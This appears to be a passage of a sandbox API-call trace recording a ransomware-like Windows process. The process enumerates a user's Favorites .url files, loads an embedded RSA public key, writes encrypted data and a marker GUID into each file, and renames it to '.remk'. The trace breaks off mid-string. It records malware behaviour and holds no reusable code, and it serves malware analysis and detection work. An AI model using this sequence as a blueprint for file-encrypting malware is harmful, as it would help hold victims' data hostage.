HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.855] WriteFile (in: hFile=0x640, lpBuffer=0x65e698*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x65e698*, lpNumberOfBytesWritten=0x3adfb14*=0x80, lpOverlapped=0x0) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0233.855] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.855] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0233.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0233.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0233.856] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0233.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0233.856] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.856] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.856] CloseHandle (hObject=0x640) returned 1 [0233.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0233.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0233.857] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185c10 | out: hHeap=0x630000) returned 1 [0233.857] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.remk")) returned 1 [0233.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0233.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.858] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0233.859] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0233.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0233.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0233.859] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0233.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.861] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0233.861] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.864] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.864] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.865] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.865] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0233.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.866] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0233.867] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.867] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.867] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.867] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.867] GetLastError () returned 0x0 [0233.867] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.867] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0233.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.867] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.867] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.867] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0233.867] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbb70 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4f0 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbbb8 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee508 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee538 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee598 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee550 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.868] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee538 | out: hHeap=0x630000) returned 1 [0233.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee550 | out: hHeap=0x630000) returned 1 [0233.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee598 | out: hHeap=0x630000) returned 1 [0233.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee598 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee550 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee538 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee550 | out: hHeap=0x630000) returned 1 [0233.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee538 | out: hHeap=0x630000) returned 1 [0233.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee598 | out: hHeap=0x630000) returned 1 [0233.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.870] GetCurrentThreadId () returned 0x314 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c23b0 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.870] GetCurrentThreadId () returned 0x314 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee598 [0233.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee538 [0233.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee550 [0233.872] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.872] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.872] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.872] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.872] CloseHandle (hObject=0x640) returned 1 [0233.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0233.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0233.874] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.remk")) returned 1 [0233.875] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0233.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0233.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0233.876] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.877] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=134) returned 1 [0233.877] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.880] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.880] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.881] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x86, lpOverlapped=0x0) returned 1 [0233.881] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.881] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.881] lstrlenA (lpString="-----BEGIN PUBLIC 